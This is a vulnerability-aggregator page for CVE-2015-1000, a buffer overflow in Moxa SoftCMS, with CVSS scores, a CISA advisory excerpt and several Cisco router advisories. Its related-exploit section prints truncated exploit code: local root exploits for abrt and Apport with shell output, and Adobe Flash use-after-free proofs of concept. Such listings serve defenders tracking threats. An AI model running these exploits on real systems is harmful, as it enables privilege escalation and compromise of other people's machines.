CVE-2015-1000
published 2015-06-05CVE-2015-1000: Stack-based buffer overflow in the OpenForIPCamTest method in the RTSPVIDEO.rtspvideoCtrl.1 (aka SStreamVideo) ActiveX control in Moxa SoftCMS before 1.3…
PriorityP338medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EPSS
3.28%
87.0th percentile
Stack-based buffer overflow in the OpenForIPCamTest method in the RTSPVIDEO.rtspvideoCtrl.1 (aka SStreamVideo) ActiveX control in Moxa SoftCMS before 1.3 allows remote attackers to execute arbitrary code via the StrRtspPath parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| moxa | softcms | <= 1.2 | — |
CVSS provenance
nvdv2.06.8MEDIUMAV:N/AC:M/Au:N/C:P/I:P/A:P
vendor_cisco8.3HIGH
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
CISA ICS
Moxa SoftCMS Buffer Overflow Vulnerability
cisa_ics·2018-08-27
Moxa SoftCMS Buffer Overflow Vulnerability
## Archived Content In an effort to keep CISA.gov current, the archive contains outdated information that may not reflect current policy or programs.
ICS Advisory
##
Moxa SoftCMS Buffer Overflow Vulnerability
Last RevisedAugust 27, 2018
Alert CodeICSA-15-153-02
## OVERVIEW
NCCIC/ICS-CERT received a report from HP’s Zero Day Initiative (ZDI) concerning a buffer overflow vulnerability in Moxa’s SoftCMS software package. This vulnerability was reported to ZDI by security researcher Ariele Caltabiano. Moxa has produced a new version that mitigates this vulnerability.
This vulnerability could be exploited remotely.
## AFFECTED PRODUCTS
The following Moxa’s SoftCMS versions are affected:
- SoftCMS, Version 1.2 and prior versions.
## IMPACT
S
Cisco
Cisco IOS XE Software Network Address Translation Denial of Service Vulnerability
vendor_cisco·2015-09-23·CVSS 7.1
CVE-2015-6282 [HIGH] CWE-399 Cisco IOS XE Software Network Address Translation Denial of Service Vulnerability
Cisco IOS XE Software Network Address Translation Denial of Service Vulnerability
A vulnerability in the processing of IPv4 packets that require Network Address Translation (NAT) and Multiprotocol Label Switching (MPLS) services of Cisco IOS XE Software for Cisco ASR 1000 Series, Cisco ISR 4300 Series, Cisco ISR 4400 Series, and Cisco Cloud Services 1000v Series Routers could allow an unauthenticated, remote attacker to cause a reload of the affected device.
The vulnerability is due to improper processing of IPv4 packets that require NAT and MPLS processing. An attacker could exploit this vulnerability by sending an IPv4 packet to be processed by a Cisco IOS XE device configured to perform NAT and MPLS services. A successful exploit could allow the attacker to cause a reload of the affec
Cisco
Cisco ASR 1000 Series Aggregation Services Routers Data-Plane Processing Denial of Service Vulnerability
vendor_cisco·2015-08-31·CVSS 5.0
CVE-2015-6274 [MEDIUM] CWE-119 Cisco ASR 1000 Series Aggregation Services Routers Data-Plane Processing Denial of Service Vulnerability
Cisco ASR 1000 Series Aggregation Services Routers Data-Plane Processing Denial of Service Vulnerability
A vulnerability in the Cisco ASR 1000 Series Aggregation Services Routers could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition.
The vulnerability is due to the processing of excessive number of IPv4 packets that require fragmentation and reassembly. An attacker could exploit ths vulnerability by sending an excessive number of fragmented packets, causing high Cisco QuantumFlow Processor (QFP) CPU utilization in the Embedded Services Processor (ESP).
Cisco has confirmed the vulnerability; however, software updates are not available.
To exploit this vulnerability, the attacker must send an excessive number of fragmented packets to the targeted s
Cisco
Cisco ASR 1000 Series Aggregation Services Routers Fragmented Packet Denial of Service Vulnerability
vendor_cisco·2015-07-30·CVSS 7.8
CVE-2015-4291 [HIGH] CWE-399 Cisco ASR 1000 Series Aggregation Services Routers Fragmented Packet Denial of Service Vulnerability
Cisco ASR 1000 Series Aggregation Services Routers Fragmented Packet Denial of Service Vulnerability
A vulnerability in the code handling the reassembly of fragmented IP version 4 (IPv4) or IP version 6 (IPv6) packets of Cisco IOS XE Software for Cisco ASR 1000 Series Aggregation Services Routers could allow an unauthenticated, remote attacker to cause a crash of the Embedded Services Processor (ESP) processing the packet.
The vulnerability is due to improper processing of crafted, fragmented packets. An attacker could exploit this vulnerability by sending a crafted sequence of fragmented packets. An exploit could allow the attacker to cause a reload of the affected platform.
Cisco has released software updates that address this vulnerability.
There are no workarounds to mitigate this
Cisco
Cisco IOS XE for Cisco 1000 Series ASR Routers Denial of Service Vulnerability
vendor_cisco·2015-07-07·CVSS 6.1
CVE-2015-4243 [MEDIUM] CWE-399 Cisco IOS XE for Cisco 1000 Series ASR Routers Denial of Service Vulnerability
Cisco IOS XE for Cisco 1000 Series ASR Routers Denial of Service Vulnerability
A vulnerability in PPP over Ethernet (PPPoE) processing on Cisco IOS XE for Cisco 1000 Series ASR routers could allow an unauthenticated, adjacent attacker to cause a reload of the affected device.
The vulnerability is due to improper processing of malformed PPPoE Active Discovery Request (PADR) packets. An attacker could exploit this vulnerability by sending PADR packets as part of PPPoE establishment. An exploit could allow the attacker to cause a reload of the affected device.
Cisco has confirmed the vulnerability and released software updates.
To exploit this vulnerability, an attacker must be on the same broadcast or collision domain as the targeted system. This access requirement reduces the likelihoo
Cisco
Cisco ASR1000 Series Routers ESP Module Denial of Service Vulnerability
vendor_cisco·2015-04-03·CVSS 7.1
CVE-2015-0688 [HIGH] CWE-399 Cisco ASR1000 Series Routers ESP Module Denial of Service Vulnerability
Cisco ASR1000 Series Routers ESP Module Denial of Service Vulnerability
A vulnerability in the Embedded Services Processor (ESP) module of Cisco ASR 1000 Series Routers running Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition.
The vulnerability is due to improper handling of malformed H.323 packets by an affected device when the device is configured to use Network Address Translation (NAT). An unauthenticated, remote attacker could exploit this vulnerability by sending malformed H.323 packets to a targeted device. A successful exploit could cause the ESP module on the device to crash, resulting in a DoS condition.
Cisco has confirmed the vulnerability and released software updates.
To exploit this vulnerability, an atta
Cisco
Cisco ASR1000 Series Routers Incomplete or Glean Adjacencies Denial of Service Vulnerability
vendor_cisco·2015-03-31·CVSS 7.8
CVE-2015-0685 [HIGH] CWE-399 Cisco ASR1000 Series Routers Incomplete or Glean Adjacencies Denial of Service Vulnerability
Cisco ASR1000 Series Routers Incomplete or Glean Adjacencies Denial of Service Vulnerability
A vulnerability in Cisco ASR 1000 Series software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition.
The vulnerability is due to improper processing of route adjacencies. An attacker could exploit this vulnerability by sending malicious IP packets to an affected device. A successful exploit could allow the attacker to cause the device to stop responding.
Cisco has confirmed the vulnerability and released software updates.
Cisco indicates through the CVSS score that functional exploit code exists; however, the code is not known to be publicly available.
Cisco
Multiple Vulnerabilities in Cisco IOS XE Software for Cisco ASR 1000 Series, Cisco ISR 4400 Series, and Cisco Cloud Services 1000v Series Routers
vendor_cisco·2015-03-25·CVSS 8.3
CVE-2015-0639 [HIGH] CWE-399 Multiple Vulnerabilities in Cisco IOS XE Software for Cisco ASR 1000 Series, Cisco ISR 4400 Series, and Cisco Cloud Services 1000v Series Routers
Multiple Vulnerabilities in Cisco IOS XE Software for Cisco ASR 1000 Series, Cisco ISR 4400 Series, and Cisco Cloud Services 1000v Series Routers
Cisco IOS XE Software for Cisco ASR 1000 Series Aggregation Services Routers (ASR), Cisco 4400 Series Integrated Services Routers (ISR), and Cisco Cloud Services Routers (CSR) 1000v Series contains the following vulnerabilities:
Cisco IOS XE Software Fragmented Packet Denial of Service Vulnerability
Cisco IOS XE Software Crafted TCP Packet Remote Code Execution Vulnerability
Cisco IOS XE Software Crafted IPv6 Packet Denial of Service Vulnerability
Cisco IOS XE Software Layer 4 Redirect Crafted Packet Denial of Service Vulnerability
Cisco IOS XE Software Common Flow Table Crafted Packet Denial of Service Vulnerability
These vulnerabilities are
Cisco
Multiple Vulnerabilities in Cisco IOS XE Software for Cisco ASR 1000 Series, Cisco ISR 4400 Series, and Cisco Cloud Services 1000v Series Routers
vendor_cisco
CVE-2015-0639 Multiple Vulnerabilities in Cisco IOS XE Software for Cisco ASR 1000 Series, Cisco ISR 4400 Series, and Cisco Cloud Services 1000v Series Routers
CVE-2015-0639: Multiple Vulnerabilities in Cisco IOS XE Software for Cisco ASR 1000 Series, Cisco ISR 4400 Series, and Cisco Cloud Services 1000v Series Routers
Cisco IOS XE Software for Cisco ASR 1000 Series Aggregation Services Routers (ASR), Cisco 4400 Series Integrated Services Routers (ISR), and Cisco Cloud Services Routers (CSR) 1000v Series contains the following vulnerabilities: Cisco IOS XE Software Fragmented Packet Denial of Service Vulnerability Cisco IOS XE Software Crafted TCP Packet Remote Code Execution Vulnerability Cisco IOS XE Software Crafted IPv6 Packet Denial of Service Vulnerability Cisco IOS XE Software Layer 4 Redirect Crafted Packet Denial of Service Vulnerability Cisco IOS XE Software Common Flow Table Crafted Packet Denial of Service Vulnerability These vulnerab
Cisco
Cisco IOS XE Software Network Address Translation Denial of Service Vulnerability
vendor_cisco
CVE-2015-6282 Cisco IOS XE Software Network Address Translation Denial of Service Vulnerability
CVE-2015-6282: Cisco IOS XE Software Network Address Translation Denial of Service Vulnerability
A vulnerability in the processing of IPv4 packets that require Network Address Translation (NAT) and Multiprotocol Label Switching (MPLS) services of Cisco IOS XE Software for Cisco ASR 1000 Series, Cisco ISR 4300 Series, Cisco ISR 4400 Series, and Cisco Cloud Services 1000v Series Routers could allow an unauthenticated, remote attacker to cause a reload of the affected device. The vulnerability is due to improper processing of IPv4 packets that require NAT and MPLS processing. An attacker could exploit this vulnerability by sending an IPv4 packet to be processed by a Cisco IOS XE device configured to perform NAT and MPLS services. A successful exploit could allow the attacker to cause a reload
Cisco
Multiple Vulnerabilities in Cisco IOS XE Software for Cisco ASR 1000 Series, Cisco ISR 4400 Series, and Cisco Cloud Services 1000v Series Routers
vendor_cisco
CVE-2015-0640 Multiple Vulnerabilities in Cisco IOS XE Software for Cisco ASR 1000 Series, Cisco ISR 4400 Series, and Cisco Cloud Services 1000v Series Routers
CVE-2015-0640: Multiple Vulnerabilities in Cisco IOS XE Software for Cisco ASR 1000 Series, Cisco ISR 4400 Series, and Cisco Cloud Services 1000v Series Routers
Cisco IOS XE Software for Cisco ASR 1000 Series Aggregation Services Routers (ASR), Cisco 4400 Series Integrated Services Routers (ISR), and Cisco Cloud Services Routers (CSR) 1000v Series contains the following vulnerabilities: Cisco IOS XE Software Fragmented Packet Denial of Service Vulnerability Cisco IOS XE Software Crafted TCP Packet Remote Code Execution Vulnerability Cisco IOS XE Software Crafted IPv6 Packet Denial of Service Vulnerability Cisco IOS XE Software Layer 4 Redirect Crafted Packet Denial of Service Vulnerability Cisco IOS XE Software Common Flow Table Crafted Packet Denial of Service Vulnerability These vulnerab
Cisco
Cisco ASR 1000 Series Aggregation Services Routers Fragmented Packet Denial of Service Vulnerability
vendor_cisco
CVE-2015-4291 Cisco ASR 1000 Series Aggregation Services Routers Fragmented Packet Denial of Service Vulnerability
CVE-2015-4291: Cisco ASR 1000 Series Aggregation Services Routers Fragmented Packet Denial of Service Vulnerability
A vulnerability in the code handling the reassembly of fragmented IP version 4 (IPv4) or IP version 6 (IPv6) packets of Cisco IOS XE Software for Cisco ASR 1000 Series Aggregation Services Routers could allow an unauthenticated, remote attacker to cause a crash of the Embedded Services Processor (ESP) processing the packet. The vulnerability is due to improper processing of crafted, fragmented packets. An attacker could exploit this vulnerability by sending a crafted sequence of fragmented packets. An exploit could allow the attacker to cause a reload of the affected platform. Cisco has released software updates that address this vulnerability. There are no
CWE: CWE-399, CWE-
Cisco
Multiple Vulnerabilities in Cisco IOS XE Software for Cisco ASR 1000 Series, Cisco ISR 4400 Series, and Cisco Cloud Services 1000v Series Routers
vendor_cisco
CVE-2015-0644 Multiple Vulnerabilities in Cisco IOS XE Software for Cisco ASR 1000 Series, Cisco ISR 4400 Series, and Cisco Cloud Services 1000v Series Routers
CVE-2015-0644: Multiple Vulnerabilities in Cisco IOS XE Software for Cisco ASR 1000 Series, Cisco ISR 4400 Series, and Cisco Cloud Services 1000v Series Routers
Cisco IOS XE Software for Cisco ASR 1000 Series Aggregation Services Routers (ASR), Cisco 4400 Series Integrated Services Routers (ISR), and Cisco Cloud Services Routers (CSR) 1000v Series contains the following vulnerabilities: Cisco IOS XE Software Fragmented Packet Denial of Service Vulnerability Cisco IOS XE Software Crafted TCP Packet Remote Code Execution Vulnerability Cisco IOS XE Software Crafted IPv6 Packet Denial of Service Vulnerability Cisco IOS XE Software Layer 4 Redirect Crafted Packet Denial of Service Vulnerability Cisco IOS XE Software Common Flow Table Crafted Packet Denial of Service Vulnerability These vulnerab
GHSA
GHSA-9x6v-mq83-vx5v: Stack-based buffer overflow in the OpenForIPCamTest method in the RTSPVIDEO
ghsa_unreviewed·2022-05-17
CVE-2015-1000 [MEDIUM] CWE-119 GHSA-9x6v-mq83-vx5v: Stack-based buffer overflow in the OpenForIPCamTest method in the RTSPVIDEO
Stack-based buffer overflow in the OpenForIPCamTest method in the RTSPVIDEO.rtspvideoCtrl.1 (aka SStreamVideo) ActiveX control in Moxa SoftCMS before 1.3 allows remote attackers to execute arbitrary code via the StrRtspPath parameter.
No detection rules found.
Exploit-DB
RHEL 7.0/7.1 - 'abrt/sosreport' Local Privilege Escalation
exploitdb·2015-12-01·CVSS 6.9
CVE-2015-5287 [MEDIUM] RHEL 7.0/7.1 - 'abrt/sosreport' Local Privilege Escalation
RHEL 7.0/7.1 - 'abrt/sosreport' Local Privilege Escalation
---
#!/usr/bin/python
# CVE-2015-5287 (?)
# abrt/sosreport RHEL 7.0/7.1 local root
# rebel 09/2015
# [user@localhost ~]$ python sosreport-rhel7.py
# crashing pid 19143
# waiting for dump directory
# dump directory: /var/tmp/abrt/ccpp-2015-11-30-19:41:13-19143
# waiting for sosreport directory
# sosreport: sosreport-localhost.localdomain-20151130194114
# waiting for tmpfiles
# tmpfiles: ['tmpurfpyY', 'tmpYnCfnQ']
# moving directory
# moving tmpfiles
# tmpurfpyY -> tmpurfpyY.old
# tmpYnCfnQ -> tmpYnCfnQ.old
# waiting for sosreport to finish (can take several minutes)........................................done
# success
# bash-4.2# id
# uid=0(root) gid=1000(user) groups=0(root),1000(user) context=unconfined_u:unconfined_r:unconfin
Exploit-DB
abrt (Centos 7.1 / Fedora 22) - Local Privilege Escalation
exploitdb·2015-12-01·CVSS 3.6
CVE-2015-5287 [LOW] abrt (Centos 7.1 / Fedora 22) - Local Privilege Escalation
abrt (Centos 7.1 / Fedora 22) - Local Privilege Escalation
---
#!/usr/bin/python
# CVE-2015-5273 + CVE-2015-5287
# CENTOS 7.1/Fedora22 local root (probably works on SL and older versions too)
# abrt-hook-ccpp insecure open() usage + abrt-action-install-debuginfo insecure temp directory usage
# rebel 09/2015
# ----------------------------------------
# [user@localhost ~]$ id
# uid=1000(user) gid=1000(user) groups=1000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
# [user@localhost ~]$ cat /etc/redhat-release
# CentOS Linux release 7.1.1503 (Core)
# [user@localhost ~]$ python abrt-centos-fedora.py
# -- lots of boring output, might take a while on a slow connection --
# /var/spool/abrt/abrt-hax-coredump created
# executing crashing process..
# success
# bash-4.2# id
#
Exploit-DB
OpenLDAP 2.4.42 - ber_get_next Denial of Service
exploitdb·2015-09-11
CVE-2015-6908 OpenLDAP 2.4.42 - ber_get_next Denial of Service
OpenLDAP 2.4.42 - ber_get_next Denial of Service
---
# Exploit Title: OpenLDAP 2.4.42 ber_get_next DOS
# Date: 11/09/15
# Exploit Author: Denis Andzakovic - Security-Assessment.com
# Vendor Homepage: http://www.openldap.org/
# Software Link:
ftp://ftp.openldap.org/pub/OpenLDAP/openldap-release/openldap-2.4.42.tgz
# Version: ) Y Y \
/______ /\___|__ / \___ >____/|__|_| /
\/ \/.-. \/ \/:wq
(x.0)
'=.|w|.='
_=''"''=.
presents..
OpenLDAP get_ber_next Denial of Service
Affected Versions: OpenLDAP >> slap_listener(ldap:///)
55f0b36e connection_get(15): got connid=1000
55f0b36e connection_read(15): checking for input on id=1000
ber_get_next
ldap_read: want=8, got=8
0000: ff 84 84 84 84 84 77 83 ......w.
55f0b36e connection_get(15): got connid=1000
55f0b36e connection_read(15): checking for inpu
Exploit-DB
Adobe Flash - textfield.gridFitType Use-After-Free
exploitdb·2015-08-19
CVE-2015-5557 Adobe Flash - textfield.gridFitType Use-After-Free
Adobe Flash - textfield.gridFitType Use-After-Free
---
Source: https://code.google.com/p/google-security-research/issues/detail?id=418&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
There is a use-after-free in the TextField gridFitType setter. A PoC is below:
var test = this.createTextField("test", 1, 0, 0, 100, 100);
var n = {toString : func, valueOf : func};
test.gridFitType = n;
function func(){
test.removeTextField();
for(var i = 0; i < 1000; i++){
var b = new flash.display.BitmapData(1000, 1000, true, 10);
}
trace("here");
return "natalie";
}
A PoC and fla are attached. Some other setters (thickness, tabIndex, etc.) are also impacted by the same UaF condition, additional SWFs are attached.
Proof of Concept:
https://gitlab.com/exploit-database/exploitd
Exploit-DB
Adobe Flash - NetConnection.connect Use-After-Free
exploitdb·2015-08-19
CVE-2015-3107 Adobe Flash - NetConnection.connect Use-After-Free
Adobe Flash - NetConnection.connect Use-After-Free
---
Source: https://code.google.com/p/google-security-research/issues/detail?id=352&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
If the fpadInfo property of a NetConnection object is a SharedObject, a use-after-free occurs when the property is deleted. A proof-of-concept is as follows:
var s = SharedObject.getLocal("test");
ASSetPropFlags(s, null, 0, 0xff);
ASSetPropFlags(s.data, null, 0, 0xff);
var q = {myprop :"natalie", myprop2 : "test"};
s.data.fpadInfo = q;
s.flush();
var n = new NetConnection();
ASnative(2100, 200)(s.data);
n.connect.call(s.data, "");
trace(s.data.fpadInfo);
s = 1;
//GC happens here
setInterval(f, 1000);
function f(){
ASnative(252, 1).call(q); //Array push
delete q.myprop;
}
A fla
Exploit-DB
Apport 2.14.1 (Ubuntu 14.04.2) - Local Privilege Escalation
exploitdb·2015-04-17·CVSS 7.2
CVE-2015-1318 [HIGH] Apport 2.14.1 (Ubuntu 14.04.2) - Local Privilege Escalation
Apport 2.14.1 (Ubuntu 14.04.2) - Local Privilege Escalation
---
#!/bin/sh
#
# CVE-2015-1318
#
# Reference: https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1438758
#
# Example:
#
# % uname -a
# Linux maggie 3.13.0-48-generic #80-Ubuntu SMP Thu Mar 12 11:16:15 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
#
# % lsb_release -a
# No LSB modules are available.
# Distributor ID: Ubuntu
# Description: Ubuntu 14.04.2 LTS
# Release: 14.04
# Codename: trusty
#
# % dpkg -l | grep '^ii apport ' | awk -F ' ' '{ print $2 " " $3 }'
# apport 2.14.1-0ubuntu3.8
#
# % id
# uid=1000(ricardo) gid=1000(ricardo) groups=1000(ricardo) (...)
#
# % ./apport.sh
# pwned-4.3# id
# uid=1000(ricardo) gid=1000(ricardo) euid=0(root) groups=0(root) (...)
# pwned-4.3# exit
TEMPDIR=$(mktemp -d)
cd ${TEMPDIR}
cp /bin/busy
Bugzilla
Fix for CVE-2015-5262 not backported to 4.2.x
bugzilla·2019-03-25·CVSS 4.3
CVE-2015-5262 [MEDIUM] Fix for CVE-2015-5262 not backported to 4.2.x
Fix for CVE-2015-5262 not backported to 4.2.x
The needinfo request[s] on this closed bug have been removed as they have been unresolved for 1000 days
Bugzilla
CVE-2015-5300 ntp: MITM attacker can force ntpd to make a step larger than the panic threshold
bugzilla·2015-10-13·CVSS 7.5
CVE-2015-5300 [HIGH] CVE-2015-5300 ntp: MITM attacker can force ntpd to make a step larger than the panic threshold
CVE-2015-5300 ntp: MITM attacker can force ntpd to make a step larger than the panic threshold
It was found that ntpd did not correctly implement the -g option:
-g Normally, ntpd exits with a message to the system log if the offset exceeds the panic threshold, which is 1000 s by default. This option allows the time to be set to any value without restriction; however, this can happen only once. If the thresh‐ old is exceeded after that, ntpd will exit with a message to the system log. This option can be used with the -q and -x options. See the tinker command for other options.
ntpd could actually step the clock multiple times by more than the panic threshold if its clock discipline doesn't have enough time to reach the sync state and stay there for at least one update. If a man-in-the-mi
Bugzilla
CVE-2015-1868 pdns: Label decompression bug in PowerDNS can cause crashes on specific platforms
bugzilla·2015-04-20·CVSS 7.8
CVE-2015-1868 [HIGH] CVE-2015-1868 pdns: Label decompression bug in PowerDNS can cause crashes on specific platforms
CVE-2015-1868 pdns: Label decompression bug in PowerDNS can cause crashes on specific platforms
PowerDNS project has reported the following issue in PowerDNS:
"""
A bug was discovered in our label decompression code, making it possible for
names to refer to themselves, thus causing a loop during decompression. This
loop is capped at a 1000 iterations by a failsafe, making the issue harmless
on most platforms.
However, on specific platforms , the recursion involved in these 1000 steps causes memory
corruption leading to a quick crash, presumably because the default stack is
too small.
We recommend that all users upgrade to a corrected version if at all possible.
Alternatively, if you want to apply a minimal fix to your own tree, it can be
found in two parts:
https://github.com/PowerDNS/p
2015-06-05
Published